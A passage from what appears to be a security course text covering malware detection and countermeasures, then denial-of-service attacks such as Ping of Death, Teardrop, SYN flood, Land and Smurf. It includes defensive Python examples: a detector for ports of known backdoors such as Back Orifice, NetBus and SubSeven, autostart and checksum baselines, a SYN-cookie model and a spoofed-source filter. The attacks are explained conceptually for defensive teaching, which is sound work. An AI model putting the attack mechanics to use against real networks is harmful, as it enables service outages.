When testing, look for computers listening on these ports. These port numbers can
usually be changed in most malware applications, so don’t rely on these completely.
Manual assessment
It helps to know your systems — what software is installed and what services are
running. Document your baseline environment, if you haven’t already, by using the
same methods I describe in this chapter.
If you suspect that one of your systems may be infected by malware, or you want to see
which applications are loaded on your system, there are tools and techniques you can
use. The key here is to search for things that just don’t look right.
Windows
Because most malware affects Windows, there are various tests specific to that platform
you can carry out to test for malware infections.
Odd file names
If you’re unsure what a specific file does or want more details on file-format and header
information, you have a couple of options for information:
# Check Wotsit’s Format at www.wotsit.org for information on file formats and
headers.
# Search for the filename in Google with both Web and Groups searches.
Netstat
# Run netstat -an at a command prompt.
# The a option displays all connections and listening ports.
# The n option displays IP addresses and port numbers in numeric form to make
them easier to read.
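An added example (not part of the manual) that applies the two checks above, the Trojan port list and netstat -an, in Python: parse_netstat reads the output of netstat -an and find_trojan_ports flags sockets bound to the listed ports. The netstat output is constructed, not captured from a real host; scan_local_host (a name chosen here) runs the real command when you want to check the machine you are on.

```python
import subprocess

# Ports the manual lists, with the backdoor each is associated with.
TROJAN_PORTS = {
    31337: "Back Orifice / Back Orifice 2000",
    54320: "Back Orifice / Back Orifice 2000",
    54321: "Back Orifice / Back Orifice 2000",
    12345: "NetBus",
    12346: "NetBus",
    1243: "SubSeven",
    27374: "SubSeven",
}

# Constructed sample of "netstat -an" output from a Windows host (not captured
# from a real machine).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1243      0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1035      10.0.0.5:80            ESTABLISHED
  TCP    192.168.1.10:27374     203.0.113.9:1052       ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:31337          *:*
"""


def parse_netstat(text):
    """Yield (proto, local_port, state) for each socket line.

    Works on the Windows layout above and on Linux "netstat -an" (which has
    Recv-Q/Send-Q columns before the addresses): the local address is the
    first field containing ':' and the port is whatever follows the last ':',
    so [::]:135 and ::ffff:10.0.0.1:80 parse the same way as dotted IPv4.
    """
    for line in text.splitlines():
        fields = line.split()
        if not fields or not fields[0].upper().startswith(("TCP", "UDP")):
            continue
        addrs = [f for f in fields[1:] if ":" in f]
        if not addrs:
            continue
        try:
            port = int(addrs[0].rsplit(":", 1)[1])
        except ValueError:
            continue
        last = fields[-1]
        state = last.upper() if ":" not in last and not last.isdigit() else ""
        yield fields[0].upper(), port, state


def find_trojan_ports(text):
    """Return (proto, port, name, state) for sockets bound to a listed Trojan port.

    TCP sockets count when LISTENING or ESTABLISHED (a connected backdoor shows
    the latter); bound UDP sockets carry no state.  An ESTABLISHED hit on a
    low port such as 1243 can also be an ordinary ephemeral client port, so
    identify the owning process before treating it as an infection.
    """
    hits = []
    for proto, port, state in parse_netstat(text):
        if port not in TROJAN_PORTS:
            continue
        if proto.startswith("TCP") and not state.startswith(("LISTEN", "ESTABLISHED")):
            continue
        hits.append((proto, port, TROJAN_PORTS[port], state))
    return hits


def scan_local_host():
    """Run netstat -an on this machine (needs the netstat binary on PATH)."""
    result = subprocess.run(["netstat", "-an"], capture_output=True, text=True, check=False)
    return find_trojan_ports(result.stdout)


if __name__ == "__main__":
    for proto, port, name, state in find_trojan_ports(SAMPLE_NETSTAT):
        print(f"{proto} {port:5} {state:12} {name}")
```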
Task Manager
Press Ctrl+Alt+Del to load the Windows Task Manager and see whether any strange
applications or processes are loaded.
Many strange-looking processes are legitimate. Make sure that you know what you’re
dealing with, so you don’t stop a legitimate program. A quick Google search on the
filename usually provides enough information. Just because it’s not there doesn’t mean
it’s not loaded, though, because some processes, such as the FU rootkit for Windows,
have the ability to hide themselves.
Registry
Look in your Windows Registry under the following HKEY_LOCAL_MACHINE (HKLM)
keys for strange-looking applications that are loading. This is a common place for
malware to be initiated upon startup.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
Startup files
Check your Windows startup folder and files such as autoexec.bat and config.sys in the
root directory of the C: drive for any applications that don’t belong. Unknown programs
can signal that a rogue application is configured to start every time the computer boots.
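The Registry and Startup files checks above come down to comparing what starts at boot with what you documented when the system was known good. The Python below is an added example (not from the manual): compare_autostart diffs a snapshot of the three Run keys, the Startup folder and autoexec.bat against a baseline, and script_launchers picks out the new entries that run through Windows Scripting Host. Both the baseline and the snapshot are constructed; read_live_run_keys uses the standard winreg module to collect the real values on a Windows host and returns nothing elsewhere.

```python
import re
import sys

# The three autostart keys the text names.
AUTOSTART_KEYS = (
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx",
)
# Extensions that Windows Scripting Host or the HTML Application host executes;
# the worm profiles earlier in this chapter persist through exactly these.
SCRIPT_HOST = re.compile(r"\.(vbs|vbe|js|jse|wsh|sct|hta)\b", re.IGNORECASE)

# Constructed baseline, documented while the machine was known clean
# (not from a real host).
BASELINE = {
    "registry": {
        AUTOSTART_KEYS[0]: {"SystemTray": "SysTray.Exe",
                            "ScanRegistry": r"C:\WINDOWS\scanregw.exe /autorun"},
        AUTOSTART_KEYS[1]: {},
        AUTOSTART_KEYS[2]: {},
    },
    "startup_folder": ["Microsoft Office.lnk"],
    "autoexec_bat": ["@ECHO OFF", r"SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND"],
}

# Constructed snapshot taken later from the same machine.
SNAPSHOT = {
    "registry": {
        AUTOSTART_KEYS[0]: {"SystemTray": "SysTray.Exe",
                            "ScanRegistry": r"C:\WINDOWS\scanregw.exe /autorun",
                            "MSKernel32": r"C:\WINDOWS\SYSTEM\MSKernel32.vbs"},
        AUTOSTART_KEYS[1]: {},
        AUTOSTART_KEYS[2]: {},
    },
    "startup_folder": ["Microsoft Office.lnk", "readme.exe"],
    "autoexec_bat": ["@ECHO OFF", r"SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND",
                     r"C:\WINDOWS\SYSTEM\update.vbs"],
}


def compare_autostart(snapshot, baseline):
    """List autostart entries that are new since the baseline or whose command
    changed, as (status, location, command) tuples."""
    findings = []
    for key, values in snapshot["registry"].items():
        known = baseline["registry"].get(key, {})
        for name, command in values.items():
            if name not in known:
                findings.append(("new", f"{key}\\{name}", command))
            elif known[name] != command:
                findings.append(("changed", f"{key}\\{name}", command))
    for section in ("startup_folder", "autoexec_bat"):
        for entry in snapshot.get(section, []):
            if entry not in baseline.get(section, []):
                findings.append(("new", section, entry))
    return findings


def script_launchers(findings):
    """The findings that hand a script to Windows Scripting Host; look at these first."""
    return [f for f in findings if SCRIPT_HOST.search(f[2])]


def read_live_run_keys():
    """Read the three keys from this host's registry with the standard winreg
    module; returns {} off Windows so the rest of the block still runs there."""
    if sys.platform != "win32":
        return {}
    import winreg
    snapshot = {}
    for key in AUTOSTART_KEYS:
        values = {}
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key.split("\\", 1)[1]) as handle:
                index = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(handle, index)
                    except OSError:
                        break                 # no more values under this key
                    values[name] = str(data)
                    index += 1
        except OSError:
            pass                              # key absent on this Windows build
        snapshot[key] = values
    return snapshot


if __name__ == "__main__":
    for status, location, command in compare_autostart(SNAPSHOT, BASELINE):
        print(f"{status:8} {location}: {command}")
```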
Antivirus
The primary protection against viruses is to install anti-virus software and keep its
updates current.
Prominent anti-virus software vendors include:
1. Mc-Afee
2. Norton Antivirus
3. Anti Viral Toolkit Pro
4. Dr. Solomon's
5. Trend Micro
6. Command Anti Virus
7. Data Fellows
Figure: 8.8 Virus Encyclopedia resources at Symantec
8.11 Malware Countermeasures____________________
You can implement various countermeasures to prevent malware attacks against your
systems, as described in the following sections.
General system administration
Security countermeasures within your organization can help prevent attacks:
# Your first and foremost goal should be to keep hackers and malware out of your systems
in the first place. If you perform the other countermeasures and system-hardening best
practices mentioned throughout this book and referenced in Appendix A, you’re on your
way.
# Create an incident-response plan. The FedCIRC Incident Handling Checklists at
www.fedcirc.gov/incidentResponse/IHchecklists.html is a good place to start.
No matter what measures you have in place to protect your systems from malware infections,
you’ll probably be attacked sometime. Plan ahead so you don’t have to make critical decisions
under pressure.
# Before deploying network wide any programs downloaded from the Internet, test and
analyze the programs for malicious behavior on isolated systems.
# Use malware-protection software (such as antivirus, spyware protection, and Trojan
testers).
Two guidelines can increase the effectiveness of your protection:
  # Load the software on the layers of your network wherever possible, including on
firewalls, content-filtering servers, e-mail gateways/firewalls, e-mail servers, and e-mail
clients.
  # Use different malware-protection applications (from multiple vendors) or a program that
combines the scanning engines of several antivirus vendors in one fell swoop, such as
Antigen from Sybari Software (www.sybari.com/home).
# Apply the latest software patches — especially critical security updates.
# Back up critical systems regularly. This could include performing the following:
  # Image or other backup that can be restored quickly in the event of a serious infection
  # Copies and MD5 or SHA checksums of critical executables in case you need to restore
or compare existing ones for authenticity
  # Emergency repair disks for critical systems in case of a malware infection
# Enable heuristics protection in your antivirus software, if possible, to help detect
behavioral anomalies that need to be blocked or cleaned.
# Never rely on digitally signed code — such as ActiveX controls that Internet Explorer
downloads and prompts you to load — to run properly on your systems. Digital
signatures on this code verify only that it came from a trustworthy source — not how it
actually behaves when it’s loaded.
# Don’t just disable such application interfaces as ActiveX, Windows Script Host,
JavaScript, and Java without a good reason.
All these programming interfaces have some legitimate uses. Applications can stop
working if these interfaces are disabled haphazardly. If the other security controls I
mention here are in place, your systems should be pretty secure from malware written in
these languages. You want to find a good balance between security and usability for
your users so that security doesn’t get in the way of people doing their jobs.
# Make sure that a firewall is always in place on your network. Use it to look for
  # Suspicious ports in use (or trying to be used)
  # Heavy traffic patterns that can signal a malware infection
# Use IDS and IDP systems to stop potential malware infections in their tracks when they
try to enter your network.
# Run a rootkit-detection application:
  # Rkdet (vancouver-Webpages.com/rkdet) for Linux checks for someone installing a rootkit
or other malware on your systems.
  # Chkrootkit (www.chkrootkit.org) tests after the fact for over 50 different installed rootkits on many
popular flavors of UNIX.
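The backup guideline above suggests keeping MD5 or SHA checksums of critical executables so they can be compared for authenticity later. As an added example (not the manual's own procedure), this Python keeps a JSON baseline of digests and reports each file as ok, modified or missing when verified again; self_check runs the whole cycle on stand-in files it creates in a temporary directory, so nothing here touches real system executables. The function names are this example's own.

```python
import hashlib
import json
import os
import tempfile


def hash_file(path, algorithm="sha256"):
    """Digest a file in 64 KiB chunks so large executables need not fit in memory."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(paths, algorithm="sha256"):
    """Record the algorithm and one digest per critical executable.

    The text mentions MD5 or SHA; SHA-256 is the default here because MD5
    collisions are practical to construct, so two different executables can
    share an MD5 and a comparison against it would pass.
    """
    return {"algorithm": algorithm,
            "files": {path: hash_file(path, algorithm) for path in paths}}


def save_baseline(baseline, path):
    """Write the baseline as JSON; keep this copy off the host it describes."""
    with open(path, "w", encoding="utf-8") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path, "r", encoding="utf-8") as f:
        return json.load(f)


def verify_baseline(baseline):
    """Recompute every digest; returns {path: "ok" | "modified" | "missing"}."""
    algorithm = baseline["algorithm"]
    status = {}
    for path, expected in baseline["files"].items():
        if not os.path.isfile(path):
            status[path] = "missing"
        elif hash_file(path, algorithm) == expected:
            status[path] = "ok"
        else:
            status[path] = "modified"
    return status


def self_check():
    """Constructed end-to-end run in a temporary directory: baseline three
    stand-in executables, append to one (as a file infector would) and delete
    another, then report what verification sees."""
    with tempfile.TemporaryDirectory() as tmp:
        samples = {"cmd.exe": b"MZ cmd", "notepad.exe": b"MZ notepad",
                   "regedit.exe": b"MZ regedit"}
        paths = []
        for name, content in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "wb") as f:
                f.write(content)
            paths.append(path)
        baseline_file = os.path.join(tmp, "baseline.json")
        save_baseline(build_baseline(paths), baseline_file)

        with open(paths[1], "ab") as f:       # tamper with notepad.exe
            f.write(b"appended payload")
        os.remove(paths[2])                   # regedit.exe disappears

        status = verify_baseline(load_baseline(baseline_file))
        return {os.path.basename(p): s for p, s in status.items()}


if __name__ == "__main__":
    print(self_check())
```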
Chapter-9
Network based Attacks
Session Objectives:
At the end of this Session, you will be able to understand –
Denial of Service
How DoS Works?
What Is DDoS?
Hacking Tool: Ping of Death
Tools for Running DDoS Attacks
Sniffers
Tool: Ethereal
ARP Spoofing
Sniffing HTTPS and SSH
Man In The Middle Attack
9.1 DENIAL OF SERVICE_________________________
9.1.1 What is Denial of Service Attack?
Denial of service (DoS) attacks are exactly what they sound like: attempts to prevent
your server from delivering services. Attackers can do this in many ways. For example,
you could describe the Outlook e-mail worm Melissa and its ilk as DoS agents because
they cause their damage by making Outlook clients flood e-mail servers with worm-laden
messages to the point that the servers collapse under the load.
This is an important point. People tend to think of DoS attacks as causing havoc by
jamming network bandwidth with useless traffic. While that's certainly one kind of DoS
attack, another succeeds by devouring server resources. That means it's possible for a
successful DoS raid to be made over a low-speed modem connection if it attacks server
resources. To really protect a network against attacks, both network and servers should
be armed and ready.
Usually, DoS attacks are aimed straight at your network's TCP/IP infrastructure. These
assaults come in three varieties: those that exploit weaknesses in a given TCP/IP stack
implementation; those that target weaknesses in the TCP/IP protocols themselves; and the
tried and true brute force attack.
9.2 Types of DoS Attacks_________________________
9.2.1 Ping of Death
The canonical example of an attack that goes after TCP/IP implementation weaknesses
is the Ping of Death attack. In this exploit, your enemy creates an IP packet that
exceeds the IP standard's maximum 65,536-byte size. When this bloated packet arrives
it crashes systems that are using a vulnerable TCP/IP stack and operating system.
All modern operating systems and stacks are immune to the Ping of Death attack, but
older UNIX systems may still be vulnerable.
9.2.2 Teardrop
Another attack that relies on poor TCP/IP implementation is Teardrop, which exploits
defects in the way systems reassemble IP packet fragments. On their way from hither to
yon on the Internet, an IP packet may be broken up into smaller pieces. Each of these
still has the original IP packet's header, as well as an offset field that identifies which
bytes of the original packet it contains.
With this information, an ordinary fragmented packet is reassembled at its destination and
network traffic continues uninterrupted. When a Teardrop attack hits, your server is
bombarded with IP fragments that have overlapping offset fields. If your server or router
can't disregard these fragments and attempts to reassemble them, your box will go
castors up quickly. If your systems are up-to-date, or if you have a firewall that blocks
Teardrop packets, you shouldn't have any trouble.
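To make concrete what disregarding overlapping fragments means, here is an added example (not from the manual) of a fragment reassembler in Python that refuses a datagram whose fragments overlap, leave a gap, never finish, or exceed the IP size limit, instead of attempting the copy that crashed vulnerable stacks. The Fragment type, the function names and the two fragment sets are constructed for this example; the offset field is in 8-byte units as in the IP header.

```python
from dataclasses import dataclass


@dataclass
class Fragment:
    """One IP fragment as a reassembler sees it.  offset is the value of the
    13-bit Fragment Offset field, which counts 8-byte units, so the fragment's
    first payload byte sits at offset * 8 in the original datagram."""
    offset: int
    payload: bytes
    more_fragments: bool      # the MF flag; clear on the last fragment only


def reassemble(fragments, max_size=65535):
    """Rebuild a datagram's payload, refusing the malformed sets Teardrop sends.

    Raises ValueError for overlapping fragments, a gap between fragments, a
    missing final fragment, or a total beyond IP's 16-bit length ceiling (the
    Ping of Death case).  The caller drops such a datagram rather than trying
    to repair it, which is what the text means by "disregard these fragments".
    Exact duplicates are treated as overlaps too: a strict policy by design.
    """
    if not fragments:
        raise ValueError("no fragments")
    frags = sorted(fragments, key=lambda f: f.offset)   # fragments may arrive out of order
    out = bytearray()
    expected = 0        # byte offset at which the next fragment must begin
    for frag in frags:
        start = frag.offset * 8
        end = start + len(frag.payload)
        if start < expected:
            # Teardrop: this fragment starts inside the previous one.  A naive
            # reassembler computes "copy length = end - expected", which goes
            # negative here and used to crash the stack.
            raise ValueError(f"overlap: fragment at byte {start} starts before {expected}")
        if start > expected:
            raise ValueError(f"gap: nothing covers bytes {expected}..{start - 1}")
        if end > max_size:
            raise ValueError(f"datagram would exceed {max_size} bytes")
        out += frag.payload
        expected = end
    if frags[-1].more_fragments:
        raise ValueError("last fragment has MF set; datagram incomplete")
    return bytes(out)


def is_safe_fragment_set(fragments):
    """True when the set reassembles cleanly; the drop decision in one call."""
    try:
        reassemble(fragments)
        return True
    except ValueError:
        return False


# Constructed samples: a normal split and a Teardrop-style overlapping pair
# (the second fragment claims to start at byte 24, inside the first's 36 bytes).
NORMAL = [Fragment(0, b"A" * 16, True), Fragment(2, b"B" * 8, False)]
TEARDROP = [Fragment(0, b"A" * 36, True), Fragment(3, b"B" * 4, False)]

if __name__ == "__main__":
    print(reassemble(NORMAL))
    print("teardrop set safe?", is_safe_fragment_set(TEARDROP))
```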
9.2.3 SYN Attack
Attempts to knock over a system using weaknesses in TCP/IP itself also abound. The most
popular of these is the SYN attack (SYN flood). It abuses the three-way handshake that
opens every TCP connection: the client sends a TCP SYN (synchronize) segment to the
server; the server replies with a SYN-ACK and records the half-open connection; the client
answers with an ACK (acknowledgment). Once the handshake is complete, the two sides are
ready to exchange data.
A SYN attack overwhelms its victim with a flood of TCP SYN segments. Every SYN forces the
targeted server to send a SYN-ACK and then hold a half-open connection while it waits for
the matching ACK. These half-open entries quickly pile up in the listener's backlog queue.
When the backlog is full, the system stops accepting new SYN requests.
If the SYN segments carry forged source addresses, the situation grows worse more quickly.
The SYN-ACKs go to hosts that never asked for a connection, so the ACK never comes back
and each entry sits in the backlog until it times out (attackers pick unreachable
addresses; a live host would answer the unexpected SYN-ACK with a RST, which frees the
entry). The overflowing backlog usually puts an end to legitimate SYN requests getting
through.
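The following added example (not code from the original course text) models the two situations described above: a listener that keeps a half-open entry per SYN, which a flood of forged sources fills, and the standard defence, SYN cookies, which encode the client's 4-tuple and a time counter into the server's initial sequence number so that no state is kept until the client's ACK proves the handshake is real. The listener classes are simplified models, the flood sources and timestamps are constructed, and the cookie layout (5 bits of time counter plus 27 bits of HMAC) is a simplification of the real Linux scheme, which also encodes the client's MSS.

```python
"""SYN backlog exhaustion versus SYN cookies, as a simplified model.
Added example; flows, timestamps and the secret are constructed."""
import hashlib
import hmac
from typing import Dict, Tuple

Flow = Tuple[str, int, str, int]   # (client ip, client port, server ip, server port)


class StatefulListener:
    """Classic listener: every SYN reserves a backlog slot until the final ACK arrives."""

    def __init__(self, backlog: int):
        self.backlog = backlog
        self.half_open: Dict[Flow, int] = {}   # flow -> ISN we sent in the SYN-ACK
        self.dropped = 0

    def on_syn(self, flow: Flow) -> bool:
        if len(self.half_open) >= self.backlog:
            self.dropped += 1                  # backlog full: the SYN is silently discarded
            return False
        self.half_open[flow] = 1000            # a real stack picks a random ISN
        return True

    def on_ack(self, flow: Flow, ack: int) -> bool:
        isn = self.half_open.get(flow)
        if isn is None or ack != isn + 1:
            return False
        del self.half_open[flow]               # slot freed only when the handshake completes
        return True


class SynCookieListener:
    """Stateless listener: the ISN itself proves that we answered this client's SYN."""

    def __init__(self, secret: bytes):
        self.secret = secret                   # rotate periodically in a real deployment

    def _cookie(self, flow: Flow, t: int) -> int:
        mac = hmac.new(self.secret, f"{flow}|{t}".encode(), hashlib.sha256).digest()
        return ((t % 32) << 27) | (int.from_bytes(mac[:4], "big") & 0x07FFFFFF)

    def on_syn(self, flow: Flow, now: int) -> int:
        """Return the ISN for the SYN-ACK; nothing is stored for this flow."""
        return self._cookie(flow, now // 64)   # 64-second time slots

    def on_ack(self, flow: Flow, ack: int, now: int) -> bool:
        isn = (ack - 1) & 0xFFFFFFFF
        for t in (now // 64, now // 64 - 1):   # accept this slot and the previous one
            if t % 32 == isn >> 27 and self._cookie(flow, t) == isn:
                return True                    # cookie verifies: allocate the connection now
        return False


def spoofed_flow(i: int, server: str) -> Flow:
    """Constructed forged source: an address that will never answer the SYN-ACK."""
    return (f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}", 50000 + i % 1000, server, 80)


def simulate(spoofed: int = 1000, backlog: int = 128) -> dict:
    server, now = "203.0.113.10", 1_700_000_000
    legit: Flow = ("198.51.100.7", 40000, server, 80)

    stateful = StatefulListener(backlog)
    for i in range(spoofed):                   # spoofed SYNs occupy slots that never drain
        stateful.on_syn(spoofed_flow(i, server))
    legit_stateful = stateful.on_syn(legit)

    cookies = SynCookieListener(b"constructed-demo-secret")
    for i in range(spoofed):                   # same flood: nothing accumulates
        cookies.on_syn(spoofed_flow(i, server), now)
    isn = cookies.on_syn(legit, now)
    return {
        "stateful_accepts_legit": legit_stateful,
        "stateful_dropped": stateful.dropped,
        "cookie_accepts_legit": cookies.on_ack(legit, isn + 1, now + 5),
        "cookie_accepts_forged": cookies.on_ack(legit, 12345, now + 5),
        "cookie_accepts_stale": cookies.on_ack(legit, isn + 1, now + 300),
    }


if __name__ == "__main__":
    for key, value in simulate().items():
        print(f"{key:24s} {value}")
```

The price of cookies is that the server forgets the options the client advertised in its SYN (window scaling, SACK) unless TCP timestamps carry them, which is why most stacks only switch to cookies once the backlog is actually full; on Linux that behaviour is the net.ipv4.tcp_syncookies sysctl.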
9.2.4 Land Attack
Adding insult to injury, the related Land attack sends spoofed SYN segments whose source
address and port are forged to be the victim's own address and port, so the SYN appears to
come from inside your firewall and the host tries to complete a handshake with itself.
Vulnerable stacks hang or crash; even where they do not, the traffic adds to your problems.
Most up-to-date operating systems and firewalls can stop SYN flooding in its tracks, for
example with SYN cookies, which let the server answer a SYN without keeping per-connection
state until the client's ACK proves the handshake is genuine. Another easy precaution is to
set your firewall to drop all incoming packets with known bad source IP addresses. The list
should include external packets bearing source addresses from the following ranges, which
are reserved for internal or loopback use and can never legitimately arrive from the
Internet: 10.0.0.0 to 10.255.255.255, 127.0.0.0 to 127.255.255.255, 172.16.0.0 to
172.31.255.255, and 192.168.0.0 to 192.168.255.255. The same rule should drop any
packet arriving from outside whose source address is one of your own.
9.2.5 Smurf Attack
But why should your enemies bother sneaking in through the back windows when they can
simply bulldoze your systems? That is the approach the Smurf attack and the User
Datagram Protocol (UDP) flood take.
In a Smurf attack the enemy sends a stream of Internet Control Message Protocol (ICMP)
echo request packets (a special kind of ping packet) to the broadcast address of a network
whose router forwards directed broadcasts, with the source address spoofed to be yours.
The router delivers each request to every host on that network, and every host answers
with an echo reply addressed to you. One spoofed packet thus turns into hundreds of
replies; with a large amplifier network this quickly leads to an electronic traffic jam of
mammoth proportions. Your own network can be abused as the amplifier in the same way
unless your routers refuse packets addressed to the broadcast address from outside (the
"no ip directed-broadcast" setting on Cisco routers).
UDP flood DoS attacks are harder to deal with, since legitimate applications such as
RealVideo also use UDP. In the classic UDP flood, an attacker spoofs a packet that
connects one system's UDP chargen service (a test service that answers each received
packet with a stream of characters) to another system's UDP echo service. The result?
Chargen's semi-random characters are reflected back and forth between the two systems
indefinitely, starving legitimate applications of bandwidth.
9.3 How DoS Works?____________________________
Now to the details of the attacks. While there are variations, they generally take a
common form. The controlled machines used to mount the attack send a stream of packets.
For most of the attacks these packets are directed at the victim machine. For one variant
(called ``smurf'', after the first circulated program to perform this attack) the packets
are aimed at other networks, where they provoke multiple echoes all aimed at the victim.
To go into further detail, some background description of the Internet is in order.
The Internet consists of hundreds of thousands or millions of small networks (called
Local Area Networks, or LANs), all interconnected; attached to these LANs are many
millions of separate computers. Any of these computers can communicate with any
other computer. This works by assigning every computer an address. The addresses
are structured (organized into groups) so that special-purpose traffic-handling
computers, called routers, can direct them in the right direction to reach their intended
destination. A typical connection today may require 15 or more hops, crossing from one
LAN to another, before it reaches its final destination. But most of these ``LANs'' are
actually special-purpose links within and between network transport companies. These
backbone providers handle the hard problems of routing traffic.
Looking a little closer, when one computer wants to send a message to another, it
divides it into pieces called ``packets'', each no larger than the path can carry (about
1,500 bytes on most links). Each packet is handled separately by the Internet, and the
message (if it is larger than a single packet) is reassembled at the remote computer. So
the traffic passing between machines consists entirely of packets of data. Each packet
carries a pair of addresses, the Source and Destination IP (Internet Protocol) addresses:
the addresses of the originating machine and of the recipient. They are quite analogous to
the address and return address on an envelope in traditional mail.
When such a packet is sent over the Internet, it is passed first to the nearest router;
commonly this router is at the point where the local network connects to the Internet.
This router is often called a border router. In larger organizations the story may be more
complex; a large organization often assembles its own collection of LANs,
interconnected into an in-house internet, cross-connected at one or more points (often
with firewalls) with the Internet that we all know and love. But returning to our tale, when
a packet leaves a computer, it is passed to a border router. This router passes it
upstream to a core router, which interconnects with many other core routers all over the
Internet; they pass the packet on until it reaches its destination. The source address is
normally ignored by routers; it normally only tells the final destination machine where the
request is coming from. That's an essential part of the problem we face today.
The packets used in today's DoS attacks carry forged source addresses; they are lying
about where the packet comes from. The very first router to receive the packet can very
easily catch the lie: it has to know what addresses lie on every network attached to it in
order to route packets to them, so if a packet arrives whose source address does not
belong to the network it came in on, the router should discard it. This style of packet
checking is called Ingress or Egress filtering depending on the point of view (Egress from
the customer network, Ingress to the heart of the Internet); it is specified in RFC 2827,
better known as BCP 38. If the packet is allowed past the border, catching the lie is
nearly impossible.
Returning to our analogy, if you hand a letter to a letter-carrier who delivers to your
home, there's a good chance he could notice if the return address is not your own. If you
deposit a letter in the corner letter-box, the mail gets handled in sacks, and routed via
high-volume automated sorters; it will never again get the close and individual attention
required to make any intelligent judgments about the accuracy of the return address.
Likewise with forged source addresses on internet packets: let them past the first border
router, and they are unlikely to be detected.
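The border-router check just described, together with the bad-source list from the Land attack section, fits in a few lines. The following is an added example, not code from the original course text: interface names, prefixes and the sample packets are constructed, and the reserved list extends the text's four ranges with 0.0.0.0/8 and 169.254.0.0/16, which the same reasoning (never a valid source arriving from the Internet) covers.

```python
"""Source-address validation at a border router (BCP 38 style) plus a
reserved-source blocklist on the uplink.  Added example; topology and
packets are constructed."""
import ipaddress
from typing import Dict, Iterable, List, Tuple

BOGON_SOURCES = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8",        # "this network"
    "10.0.0.0/8",       # RFC 1918 private
    "127.0.0.0/8",      # loopback
    "169.254.0.0/16",   # link-local
    "172.16.0.0/12",    # RFC 1918 private
    "192.168.0.0/16",   # RFC 1918 private
)]


class BorderRouter:
    """Decide, per ingress interface, whether a packet's source address is plausible."""

    def __init__(self, interfaces: Dict[str, Iterable[str]], uplink: str):
        # customer-facing interface -> prefixes legitimately attached behind it
        self.attached = {name: [ipaddress.ip_network(p) for p in prefixes]
                         for name, prefixes in interfaces.items()}
        self.uplink = uplink

    def _is_ours(self, addr) -> bool:
        return any(addr in net for nets in self.attached.values() for net in nets)

    def accept(self, in_iface: str, src: str) -> Tuple[bool, str]:
        addr = ipaddress.ip_address(src)
        if in_iface == self.uplink:
            # Ingress from the Internet: reserved sources and our own prefixes
            # (the Land pattern) can only be spoofed.
            if any(addr in net for net in BOGON_SOURCES):
                return False, "reserved source address from uplink"
            if self._is_ours(addr):
                return False, "our own prefix as source from uplink (Land pattern)"
            return True, "ok"
        nets = self.attached.get(in_iface)
        if nets is None:
            return False, "unknown interface"
        # Egress from a customer LAN: the source must belong to that LAN; anything
        # else is a forged source that no router further upstream can catch.
        if not any(addr in net for net in nets):
            return False, "source not attached to ingress interface (BCP 38 drop)"
        return True, "ok"


def filter_packets(router: BorderRouter,
                   packets: List[Tuple[str, str, str]]) -> List[Tuple[bool, str]]:
    """Apply the check to (ingress interface, source, destination) triples."""
    return [router.accept(iface, src) for iface, src, _dst in packets]


# Constructed topology: one customer LAN holding 203.0.113.0/24 behind lan0, Internet on wan0.
ROUTER = BorderRouter({"lan0": ["203.0.113.0/24"]}, uplink="wan0")

# Constructed sample packets.
SAMPLE_PACKETS = [
    ("lan0", "203.0.113.25", "198.51.100.9"),   # legitimate outbound
    ("lan0", "192.0.2.77", "198.51.100.9"),     # forged source leaving our LAN: catch it here or never
    ("wan0", "198.51.100.9", "203.0.113.25"),   # legitimate inbound
    ("wan0", "10.4.4.4", "203.0.113.25"),       # RFC 1918 source arriving from the Internet
    ("wan0", "203.0.113.25", "203.0.113.25"),   # Land-style: our own address as source
]

if __name__ == "__main__":
    for (iface, src, dst), (ok, why) in zip(SAMPLE_PACKETS, filter_packets(ROUTER, SAMPLE_PACKETS)):
        print(f"{iface} {src:>14} -> {dst:<14} {'PASS' if ok else 'DROP'}  {why}")
```

On a real router the lan0 rule is the one that matters for everybody else: the blocklist protects you, the attached-prefix check keeps your compromised hosts from being useful as flood sources. Multi-homed customers whose prefixes arrive over more than one link need the per-interface table to list every prefix that can legitimately appear on each one, or the check will drop their traffic.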
Now let's look at the situation from the victim's point of view. The first thing you know,
the first sign that you may have a problem, is when thousands of compromised systems
all over the world commence to flood you with traffic, all at once. The first symptom is
likely to be a router crash, or to look a lot like one; traffic simply stops flowing between
you and the Internet. When you look more closely you may discover that one or more
targeted servers are being overloaded by the small fraction of the traffic that actually
gets delivered, but the failures extend much further back.
So you try and find out what's going wrong. After the first few quick checks don't solve
the problem, you look at the traffic flowing through your network, and about then you
realize you are a victim of a major denial of service attack. So you capture a sample of
the packets flying over your net, as many as you can. What does each packet tell you?
Well, it will have your address as its destination address, and it will have some random
number as a source address. There's no trace of the compromised host that is busy
attacking you now. All that's there is a low-level, hardware address of the last router that
forwarded the packet; these low-level addresses are used to handle distribution of
packets within a LAN. So you can see what router passed the packet to you, but nothing
else. Identifying that router may identify the Internet carrier that passed the traffic to you,
if you don't have a complex internet of your own, within your own organization. But
either way, the next step is to capture another packet on the other side of the forwarding
router, and see where that packet came from. Each step of the trace requires starting
over, collecting fresh evidence.
Every time the back-trace crosses an administrative boundary, between you and your
Internet provider, between them and the next backbone provider on the path, all the way
